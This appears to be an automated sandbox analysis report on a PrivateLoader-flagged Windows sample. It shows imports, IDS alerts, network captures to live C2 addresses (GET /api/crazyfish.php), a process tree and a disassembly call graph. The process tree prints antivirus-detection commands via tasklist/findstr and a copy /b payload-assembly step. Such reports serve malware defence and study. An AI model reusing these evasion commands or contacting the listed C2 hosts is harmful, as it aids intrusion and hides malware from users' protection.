                  USER32.dll | ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, FindWindowExW, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, IsWindow
                  GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                  ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                  COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-09-12T21:26:46.244720+0200 | 2054709 | ET MALWARE PrivateLoader CnC Activity (GET) | 1 | 192.168.2.7 | 49704 | 195.10.205.48 | 80 | TCP
                  2024-09-12T21:26:54.244678+0200 | 2054709 | ET MALWARE PrivateLoader CnC Activity (GET) | 1 | 192.168.2.7 | 49705 | 193.233.232.86 | 80 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 12, 2024 21:26:38.273044109 CEST | 49704 | 80 | 192.168.2.7 | 195.10.205.48
                  Sep 12, 2024 21:26:38.356275082 CEST | 80 | 49704 | 195.10.205.48 | 192.168.2.7
                  Sep 12, 2024 21:26:38.356380939 CEST | 49704 | 80 | 192.168.2.7 | 195.10.205.48
                  Sep 12, 2024 21:26:38.356565952 CEST | 49704 | 80 | 192.168.2.7 | 195.10.205.48
                  Sep 12, 2024 21:26:38.361618042 CEST | 80 | 49704 | 195.10.205.48 | 192.168.2.7
                  Sep 12, 2024 21:26:46.244719982 CEST | 49704 | 80 | 192.168.2.7 | 195.10.205.48
                  Sep 12, 2024 21:26:46.248982906 CEST | 49705 | 80 | 192.168.2.7 | 193.233.232.86
                  Sep 12, 2024 21:26:46.417675972 CEST | 80 | 49705 | 193.233.232.86 | 192.168.2.7
                  Sep 12, 2024 21:26:46.417779922 CEST | 49705 | 80 | 192.168.2.7 | 193.233.232.86
                  Sep 12, 2024 21:26:46.417933941 CEST | 49705 | 80 | 192.168.2.7 | 193.233.232.86
                  Sep 12, 2024 21:26:46.422954082 CEST | 80 | 49705 | 193.233.232.86 | 192.168.2.7
                  Sep 12, 2024 21:26:54.244678020 CEST | 49705 | 80 | 192.168.2.7 | 193.233.232.86
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 12, 2024 21:26:09.224596977 CEST | 58687 | 53 | 192.168.2.7 | 1.1.1.1
                  Sep 12, 2024 21:26:09.246236086 CEST | 53 | 58687 | 1.1.1.1 | 192.168.2.7
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Sep 12, 2024 21:26:09.224596977 CEST | 192.168.2.7 | 1.1.1.1 | 0x3293 | Standard query (0) | aSrgKXZxBg.aSrgKXZxBg | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Sep 12, 2024 21:26:09.246236086 CEST | 1.1.1.1 | 192.168.2.7 | 0x3293 | Name error (3) | aSrgKXZxBg.aSrgKXZxBg | none | none | A (IP address) | IN (0x0001) | false
                  • 195.10.205.48
                  • 193.233.232.86
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.7 | 49704 | 195.10.205.48 | 80 | 6196 | C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 12, 2024 21:26:38.356565952 CEST | 219 | OUT | GET /api/crazyfish.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
                  Host: 195.10.205.48


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.7 | 49705 | 193.233.232.86 | 80 | 6196 | C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 12, 2024 21:26:46.417933941 CEST | 220 | OUT | GET /api/crazyfish.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
                  Host: 193.233.232.86


                  Target ID:0
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Users\user\Desktop\wWk9NkXYcL.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\wWk9NkXYcL.exe"
                  Imagebase:0x400000
                  File size:23'265'280 bytes
                  MD5 hash:3A1CCC44A0AA6F397C3B2EACF6D4C526
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:15:26:06
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\tasklist.exe
                  Wow64 process (32bit):true
                  Commandline:tasklist
                  Imagebase:0xa00000
                  File size:79'360 bytes
                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:5
                  Start time:15:26:06
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:6
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\tasklist.exe
                  Wow64 process (32bit):true
                  Commandline:tasklist
                  Imagebase:0xa00000
                  File size:79'360 bytes
                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:7
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:10
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd /c md 473638
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /V "MaskBathroomCompositionInjection" Participants
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:14
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:17
                  Start time:15:26:08
                  Start date:12/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Wow64 process (32bit):false
                  Commandline:Element.pif Q
                  Imagebase:0x7ff6c5870000
                  File size:1'065'128 bytes
                  MD5 hash:C63860691927D62432750013B5A20F5F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:18
                  Start time:15:26:08
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\choice.exe
                  Wow64 process (32bit):true
                  Commandline:choice /d y /t 5
                  Imagebase:0xd00000
                  File size:28'160 bytes
                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:21
                  Start time:16:57:18
                  Start date:12/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user~1\AppData\Local\Temp\473638\Element.pif
                  Imagebase:0x7ff6c5870000
                  File size:1'065'128 bytes
                  MD5 hash:C63860691927D62432750013B5A20F5F
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:25
                  Start time:16:57:40
                  Start date:12/09/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6196 -s 692
                  Imagebase:0x7ff7350b0000
                  File size:570'736 bytes
                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true


                    Execution Graph

                    Execution Coverage:13.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:21.4%
                    Total number of Nodes:1325
                    Total number of Limit Nodes:22
3264->3240 3266 405bbf 3 API calls 3265->3266 3267 40540e 3266->3267 3268 405414 3267->3268 3269 405426 3267->3269 3433 4059ff wsprintfW 3268->3433 3270 405981 3 API calls 3269->3270 3271 405457 3270->3271 3273 405476 lstrcatW 3271->3273 3275 405981 3 API calls 3271->3275 3274 405424 3273->3274 3424 4039fc 3274->3424 3275->3273 3278 406042 18 API calls 3279 4054a7 3278->3279 3280 405543 3279->3280 3282 405981 3 API calls 3279->3282 3281 406042 18 API calls 3280->3281 3283 40554e 3281->3283 3284 4054d9 3282->3284 3285 40555e LoadImageW 3283->3285 3286 4060ca 18 API calls 3283->3286 3284->3280 3289 4054fe lstrlenW 3284->3289 3293 4057b3 CharNextW 3284->3293 3287 405613 3285->3287 3288 405589 RegisterClassW 3285->3288 3286->3285 3292 40141d 2 API calls 3287->3292 3290 40561d 3288->3290 3291 4055ce SystemParametersInfoW CreateWindowExW 3288->3291 3294 405532 3289->3294 3295 40550c lstrcmpiW 3289->3295 3290->3172 3291->3287 3296 405619 3292->3296 3297 4054f9 3293->3297 3299 405fe6 3 API calls 3294->3299 3295->3294 3298 40551c GetFileAttributesW 3295->3298 3296->3290 3302 4039fc 19 API calls 3296->3302 3297->3289 3301 405528 3298->3301 3300 405538 3299->3300 3434 405ab8 lstrcpynW 3300->3434 3301->3294 3305 406015 2 API calls 3301->3305 3303 40562a 3302->3303 3306 405636 ShowWindow LoadLibraryW 3303->3306 3307 4056bc 3303->3307 3305->3294 3308 405655 LoadLibraryW 3306->3308 3309 40565c GetClassInfoW 3306->3309 3435 404b48 OleInitialize 3307->3435 3308->3309 3311 405689 DialogBoxParamW 3309->3311 3312 40566f GetClassInfoW RegisterClassW 3309->3312 3314 40141d 2 API calls 3311->3314 3312->3311 3313 4056c2 3315 4056c6 3313->3315 3316 4056de 3313->3316 3318 4056b1 3314->3318 3315->3290 3319 40141d 2 API calls 3315->3319 3317 40141d 2 API calls 3316->3317 3317->3290 3318->3290 3319->3290 3321 403403 3320->3321 3322 4033f5 CloseHandle 3320->3322 3450 40380b 3321->3450 3322->3321 3328 405762 3327->3328 3329 403677 ExitProcess 3328->3329 3330 405778 MessageBoxIndirectW 3328->3330 
3330->3329 3331->3162 3502 405ab8 lstrcpynW 3332->3502 3334 406053 3503 405807 CharNextW CharNextW 3334->3503 3337 405ae7 5 API calls 3343 406069 3337->3343 3338 4060a2 lstrlenW 3339 4060a9 3338->3339 3338->3343 3341 405fe6 3 API calls 3339->3341 3340 405b98 2 API calls 3340->3343 3342 4060af GetFileAttributesW 3341->3342 3344 403626 3342->3344 3343->3338 3343->3340 3343->3344 3345 406015 2 API calls 3343->3345 3344->3172 3346 405ab8 lstrcpynW 3344->3346 3345->3338 3346->3205 3347->3208 3348->3195 3349->3200 3350->3220 3352 405bbf 3 API calls 3351->3352 3353 40652d 3352->3353 3355 40654e 3353->3355 3509 40635b lstrcpyW 3353->3509 3355->3220 3357 405727 3356->3357 3358 40571b CloseHandle 3356->3358 3357->3220 3358->3357 3360 40139b 2 API calls 3359->3360 3361 401432 3360->3361 3361->3181 3363 406003 lstrcatW 3362->3363 3364 40337e CreateDirectoryW 3362->3364 3363->3364 3364->3235 3365->3239 3366->3242 3368 406024 3367->3368 3369 403187 3368->3369 3370 40602a CharPrevW 3368->3370 3371 405ab8 lstrcpynW 3369->3371 3370->3368 3370->3369 3371->3246 3373 402ebf 3372->3373 3373->3247 3375 402e43 3374->3375 3376 402e5b 3374->3376 3377 402e53 3375->3377 3378 402e4c DestroyWindow 3375->3378 3379 402e63 3376->3379 3380 402e6b GetTickCount 3376->3380 3377->3249 3378->3377 3408 405bf6 3379->3408 3382 402e79 CreateDialogParamW ShowWindow 3380->3382 3383 402e9c 3380->3383 3382->3383 3383->3249 3385->3257 3387 402f02 3386->3387 3388 402f2f 3387->3388 3412 402ed0 SetFilePointer 3387->3412 3390 402e9e ReadFile 3388->3390 3391 402f3a 3390->3391 3392 402f53 GetTickCount 3391->3392 3393 4030ae 3391->3393 3399 402f3e 3391->3399 3396 402fa0 3392->3396 3392->3399 3394 4030b2 3393->3394 3395 4030d6 3393->3395 3397 402e9e ReadFile 3394->3397 3395->3399 3400 402e9e ReadFile 3395->3400 3401 4030f5 WriteFile 3395->3401 3398 402e9e ReadFile 3396->3398 3396->3399 3403 402ff2 GetTickCount 3396->3403 3404 403017 MulDiv wsprintfW 3396->3404 3406 40305b WriteFile 3396->3406 3397->3399 3398->3396 
3399->3263 3400->3395 3401->3399 3402 403109 3401->3402 3402->3395 3402->3399 3403->3396 3413 404a73 3404->3413 3406->3396 3406->3399 3407->3255 3409 405c13 PeekMessageW 3408->3409 3410 402e69 3409->3410 3411 405c09 DispatchMessageW 3409->3411 3410->3249 3411->3409 3412->3388 3414 404a8c 3413->3414 3423 404b30 3413->3423 3415 404aaa lstrlenW 3414->3415 3416 4060ca 18 API calls 3414->3416 3417 404ad3 3415->3417 3418 404ab8 lstrlenW 3415->3418 3416->3415 3420 404ae6 3417->3420 3421 404ad9 SetWindowTextW 3417->3421 3419 404aca lstrcatW 3418->3419 3418->3423 3419->3417 3422 404aec SendMessageW SendMessageW SendMessageW 3420->3422 3420->3423 3421->3420 3422->3423 3423->3396 3425 403a10 3424->3425 3442 4059ff wsprintfW 3425->3442 3427 403a84 3428 4060ca 18 API calls 3427->3428 3429 403a90 SetWindowTextW 3428->3429 3430 403aab 3429->3430 3431 403ac6 3430->3431 3432 4060ca 18 API calls 3430->3432 3431->3278 3432->3430 3433->3274 3434->3280 3443 403937 3435->3443 3437 404b92 3438 403937 SendMessageW 3437->3438 3440 404ba4 OleUninitialize 3438->3440 3439 404b6b 3439->3437 3446 40139b 3439->3446 3440->3313 3442->3427 3444 403940 SendMessageW 3443->3444 3445 40394f 3443->3445 3444->3445 3445->3439 3448 4013a2 3446->3448 3447 401410 3447->3439 3448->3447 3449 4013dd MulDiv SendMessageW 3448->3449 3449->3448 3452 403819 3450->3452 3451 403408 3454 406559 3451->3454 3452->3451 3453 40381e FreeLibrary GlobalFree 3452->3453 3453->3451 3453->3453 3455 406042 18 API calls 3454->3455 3456 40656c 3455->3456 3457 406577 DeleteFileW 3456->3457 3458 40658e 3456->3458 3488 403414 CoUninitialize 3457->3488 3459 4066df 3458->3459 3494 405ab8 lstrcpynW 3458->3494 3459->3488 3499 405b98 FindFirstFileW 3459->3499 3461 4065b6 3462 4065c2 lstrcatW 3461->3462 3463 4065cc 3461->3463 3464 4065d2 3462->3464 3465 406015 2 API calls 3463->3465 3467 4065e2 lstrcatW 3464->3467 3468 4065d8 3464->3468 3465->3464 3470 4065ea lstrlenW FindFirstFileW 3467->3470 3468->3467 3468->3470 3475 4066ce 3470->3475 
3491 406611 3470->3491 3471 405fe6 3 API calls 3473 4066fb 3471->3473 3472 4057b3 CharNextW 3472->3491 3474 4058de 2 API calls 3473->3474 3476 406701 RemoveDirectoryW 3474->3476 3475->3459 3477 40672b 3476->3477 3478 40670c 3476->3478 3480 404a73 25 API calls 3477->3480 3482 404a73 25 API calls 3478->3482 3478->3488 3480->3488 3481 4066ab FindNextFileW 3483 4066c3 FindClose 3481->3483 3481->3491 3484 40671a 3482->3484 3483->3475 3485 406526 42 API calls 3484->3485 3485->3488 3487 406559 63 API calls 3487->3491 3488->3178 3488->3179 3490 404a73 25 API calls 3490->3481 3491->3472 3491->3481 3491->3487 3491->3490 3492 404a73 25 API calls 3491->3492 3493 406526 42 API calls 3491->3493 3495 405ab8 lstrcpynW 3491->3495 3496 4058de GetFileAttributesW 3491->3496 3492->3491 3493->3491 3494->3461 3495->3491 3497 4058fb DeleteFileW 3496->3497 3498 4058ed SetFileAttributesW 3496->3498 3497->3491 3498->3497 3500 405bb9 3499->3500 3501 405bae FindClose 3499->3501 3500->3471 3500->3488 3501->3500 3502->3334 3504 405824 3503->3504 3506 405836 3503->3506 3505 405831 CharNextW 3504->3505 3504->3506 3508 40585a 3505->3508 3507 4057b3 CharNextW 3506->3507 3506->3508 3507->3506 3508->3337 3508->3344 3510 406380 3509->3510 3511 4063a9 GetShortPathNameW 3509->3511 3535 4058fe GetFileAttributesW CreateFileW 3510->3535 3513 406520 3511->3513 3514 4063c2 3511->3514 3513->3355 3514->3513 3516 4063ca WideCharToMultiByte 3514->3516 3515 406389 CloseHandle GetShortPathNameW 3515->3513 3517 4063a1 3515->3517 3516->3513 3518 4063e7 WideCharToMultiByte 3516->3518 3517->3511 3517->3513 3518->3513 3519 4063ff wsprintfA 3518->3519 3520 4060ca 18 API calls 3519->3520 3521 40642b 3520->3521 3536 4058fe GetFileAttributesW CreateFileW 3521->3536 3523 406438 3523->3513 3524 406445 GetFileSize GlobalAlloc 3523->3524 3525 406516 CloseHandle 3524->3525 3526 406466 ReadFile 3524->3526 3525->3513 3526->3525 3527 406480 3526->3527 3527->3525 3537 405864 lstrlenA 3527->3537 3530 406499 lstrcpyA 3533 4064bb 
3530->3533 3531 4064ad 3532 405864 4 API calls 3531->3532 3532->3533 3534 4064ee SetFilePointer WriteFile GlobalFree 3533->3534 3534->3525 3535->3515 3536->3523 3538 4058a5 lstrlenA 3537->3538 3539 4058ad 3538->3539 3540 40587e lstrcmpiA 3538->3540 3539->3530 3539->3531 3540->3539 3541 40589c CharNextA 3540->3541 3541->3538 4343 402218 4344 40145c 18 API calls 4343->4344 4345 402220 4344->4345 4346 40145c 18 API calls 4345->4346 4347 40222b 4346->4347 4348 40145c 18 API calls 4347->4348 4349 402235 4348->4349 4350 40145c 18 API calls 4349->4350 4351 402240 4350->4351 4352 40145c 18 API calls 4351->4352 4354 40224b 4352->4354 4353 402260 CoCreateInstance 4356 402280 4353->4356 4354->4353 4355 40145c 18 API calls 4354->4355 4355->4353 4357 402c18 SendMessageW 4358 402c34 InvalidateRect 4357->4358 4359 402c58 4357->4359 4358->4359 3612 401f9b 3613 40145c 18 API calls 3612->3613 3614 401fa2 3613->3614 3615 40145c 18 API calls 3614->3615 3616 401fac 3615->3616 3617 40145c 18 API calls 3616->3617 3618 401fb7 3617->3618 3619 40145c 18 API calls 3618->3619 3620 401fc1 3619->3620 3624 401435 3620->3624 3623 401ff9 3625 404a73 25 API calls 3624->3625 3626 401443 ShellExecuteW 3625->3626 3626->3623 3627 40139b 3629 4013a2 3627->3629 3628 401410 3629->3628 3630 4013dd MulDiv SendMessageW 3629->3630 3630->3629 4360 401c1c 4361 401446 18 API calls 4360->4361 4362 401c26 4361->4362 4363 401446 18 API calls 4362->4363 4364 401c30 4363->4364 4367 4059ff wsprintfW 4364->4367 4366 402c58 4367->4366 4368 403c1f 4369 403c3a 4368->4369 4377 403d67 4368->4377 4373 403c74 4369->4373 4399 403b31 WideCharToMultiByte 4369->4399 4370 403dd2 4371 403ea4 4370->4371 4372 403ddc GetDlgItem 4370->4372 4378 403952 8 API calls 4371->4378 4374 403e65 4372->4374 4375 403df6 4372->4375 4380 4038c7 19 API calls 4373->4380 4374->4371 4383 403e77 4374->4383 4375->4374 4382 403e1c 6 API calls 4375->4382 4377->4370 4377->4371 4379 403da3 GetDlgItem SendMessageW 4377->4379 4381 403e9f 4378->4381 4404 40390d 
EnableWindow 4379->4404 4385 403cb4 4380->4385 4382->4374 4387 403e8d 4383->4387 4388 403e7d SendMessageW 4383->4388 4386 4038c7 19 API calls 4385->4386 4390 403cc1 CheckDlgButton 4386->4390 4387->4381 4391 403e93 SendMessageW 4387->4391 4388->4387 4389 403dcd 4392 4038e9 SendMessageW 4389->4392 4402 40390d EnableWindow 4390->4402 4391->4381 4392->4370 4394 403cdf GetDlgItem 4403 403920 SendMessageW 4394->4403 4396 403cf5 SendMessageW 4397 403d12 GetSysColor 4396->4397 4398 403d1b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4396->4398 4397->4398 4398->4381 4400 403b50 GlobalAlloc WideCharToMultiByte 4399->4400 4401 403b6e 4399->4401 4400->4401 4401->4373 4402->4394 4403->4396 4404->4389 4405 401ba0 4406 40145c 18 API calls 4405->4406 4407 401ba8 ExpandEnvironmentStringsW 4406->4407 4408 401bbb 4407->4408 4410 401bcd 4407->4410 4409 401bc1 lstrcmpW 4408->4409 4408->4410 4409->4410 4411 401822 4412 40145c 18 API calls 4411->4412 4413 401829 GetFullPathNameW 4412->4413 4416 401840 4413->4416 4420 401863 4413->4420 4414 402c58 4415 40187b GetShortPathNameW 4415->4414 4417 405b98 2 API calls 4416->4417 4416->4420 4418 401853 4417->4418 4418->4420 4421 405ab8 lstrcpynW 4418->4421 4420->4414 4420->4415 4421->4420 4422 401625 4423 40162b 4422->4423 4424 40139b 2 API calls 4423->4424 4425 401634 4424->4425 4426 401ca6 4427 40145c 18 API calls 4426->4427 4428 401cae 4427->4428 4429 401446 18 API calls 4428->4429 4430 401cb8 wsprintfW 4429->4430 4431 402c58 4430->4431 4432 4028ab 4433 401446 18 API calls 4432->4433 4435 4028b5 4433->4435 4434 402838 4435->4434 4436 4028ee ReadFile 4435->4436 4437 402946 4435->4437 4436->4434 4436->4435 4437->4434 4438 401446 18 API calls 4437->4438 4439 40298e 4438->4439 4440 402995 SetFilePointer 4439->4440 4440->4434 4441 4029a6 4440->4441 4443 4059ff wsprintfW 4441->4443 4443->4434 3635 40172d 3636 40145c 18 API calls 3635->3636 3637 401735 3636->3637 3638 405807 4 API calls 3637->3638 3649 40173d 3638->3649 3639 401786 
3640 4017aa 3639->3640 3641 40178c 3639->3641 3646 401435 25 API calls 3640->3646 3643 401435 25 API calls 3641->3643 3642 4057b3 CharNextW 3644 40174b CreateDirectoryW 3642->3644 3645 401793 3643->3645 3647 401761 GetLastError 3644->3647 3644->3649 3653 405ab8 lstrcpynW 3645->3653 3652 4017b1 3646->3652 3647->3649 3650 40176e GetFileAttributesW 3647->3650 3649->3639 3649->3642 3650->3649 3651 40179e SetCurrentDirectoryW 3651->3652 3653->3651 4444 4026ae 4445 4026bc 4444->4445 4446 4026bd CloseHandle 4445->4446 4447 402c58 4446->4447 4448 402a2f 4449 40145c 18 API calls 4448->4449 4450 402a3c 4449->4450 4451 402a53 4450->4451 4452 40145c 18 API calls 4450->4452 4453 4058de 2 API calls 4451->4453 4452->4451 4454 402a59 4453->4454 4474 4058fe GetFileAttributesW CreateFileW 4454->4474 4456 402a66 4457 402a72 GlobalAlloc 4456->4457 4458 402b0f 4456->4458 4459 402b06 CloseHandle 4457->4459 4460 402a8b 4457->4460 4461 402b16 DeleteFileW 4458->4461 4462 402b29 4458->4462 4459->4458 4475 402ed0 SetFilePointer 4460->4475 4461->4462 4464 402a92 4465 402e9e ReadFile 4464->4465 4466 402a9b GlobalAlloc 4465->4466 4467 402aab 4466->4467 4468 402add WriteFile GlobalFree 4466->4468 4469 402ee7 33 API calls 4467->4469 4470 402ee7 33 API calls 4468->4470 4473 402ab9 4469->4473 4471 402b04 4470->4471 4471->4459 4472 402ad4 GlobalFree 4472->4468 4473->4472 4474->4456 4475->4464 4476 402b2f 4477 401446 18 API calls 4476->4477 4478 402b36 4477->4478 4479 401721 4478->4479 4480 402b85 4478->4480 4481 402b78 4478->4481 4483 4060ca 18 API calls 4480->4483 4482 401446 18 API calls 4481->4482 4482->4479 4483->4479 4484 4020af 4485 40145c 18 API calls 4484->4485 4486 4020b7 GetFileVersionInfoSizeW 4485->4486 4487 4020dd GlobalAlloc 4486->4487 4489 402c58 4486->4489 4488 4020f1 GetFileVersionInfoW 4487->4488 4487->4489 4490 402101 VerQueryValueW 4488->4490 4491 402132 GlobalFree 4488->4491 4490->4491 4492 40211a 4490->4492 4491->4489 4497 4059ff wsprintfW 4492->4497 4495 402126 4498 4059ff 
wsprintfW 4495->4498 4497->4495 4498->4491 4499 4029af 4503 405a18 4499->4503 4502 402c58 4504 4029bd FindClose 4503->4504 4504->4502 4505 402db4 4506 402dc6 SetTimer 4505->4506 4507 402ddf 4505->4507 4506->4507 4508 402e34 4507->4508 4509 402df9 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4507->4509 4509->4508 4510 404bb4 4511 404d61 4510->4511 4512 404bd5 GetDlgItem GetDlgItem GetDlgItem 4510->4512 4513 404d6a GetDlgItem CreateThread CloseHandle 4511->4513 4517 404d92 4511->4517 4556 403920 SendMessageW 4512->4556 4513->4517 4515 404c49 4521 404c50 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4515->4521 4516 404dc0 4520 404e1e 4516->4520 4523 404dd1 4516->4523 4524 404df7 ShowWindow 4516->4524 4517->4516 4518 404de2 4517->4518 4519 404dac ShowWindow ShowWindow 4517->4519 4525 403952 8 API calls 4518->4525 4558 403920 SendMessageW 4519->4558 4520->4518 4528 404e29 SendMessageW 4520->4528 4526 404ca3 SendMessageW SendMessageW 4521->4526 4527 404cbf 4521->4527 4529 4038a0 SendMessageW 4523->4529 4531 404e17 4524->4531 4532 404e09 4524->4532 4530 404d5a 4525->4530 4526->4527 4535 404cd2 4527->4535 4536 404cc4 SendMessageW 4527->4536 4528->4530 